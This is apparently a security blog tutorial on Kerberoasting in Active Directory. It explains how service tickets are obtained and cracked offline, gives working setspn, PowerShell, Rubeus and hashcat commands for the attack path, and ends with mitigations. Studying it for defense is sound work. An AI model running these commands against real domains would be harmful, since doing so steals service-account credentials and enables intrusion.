Kerberoasting: Exploiting Service Accounts
"A deep dive into Kerberoasting techniques to crack service account passwords in Active Directory."
Kerberoasting: Exploiting Service Accounts
Kerberoasting is one of the most effective techniques for gathering credentials in an Active Directory environment without sending any traffic to the target service.
How it Works
- SPN Discovery: An attacker queries AD for user accounts that have a Service Principal Name (SPN) set.
- TGS Request: The attacker requests a Kerberos service ticket (TGS) for those SPNs. Because any user can request a ticket for any service, no special privileges are needed.
- Offline Cracking: The TGS is encrypted with the service account's NTLM hash. The attacker extracts the ticket from memory and cracks it offline using
hashcatorJohn the Ripper.
Attack Path
1. Enumerate SPNs
Using PowerView or built-in setspn:
setspn -T YOURDOMAIN -Q */*
2. Request Tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db01.domain.local:1433"
3. Extract and Crack
Use Mimikatz or Rubeus to export the tickets:
Rubeus.exe kerberoast /outfile:hashes.txt
Cracking with Hashcat (Mode 13100):
hashcat -m 13100 hashes.txt wordlist.txt
Mitigation
- Strong Passwords: Ensure service account passwords are 25+ characters.
- Managed Service Accounts (gMSA): Use gMSAs where Windows manages the complex password rotation automatically.
- Monitoring: Alert on an unusual number of TGS requests with RC4 encryption.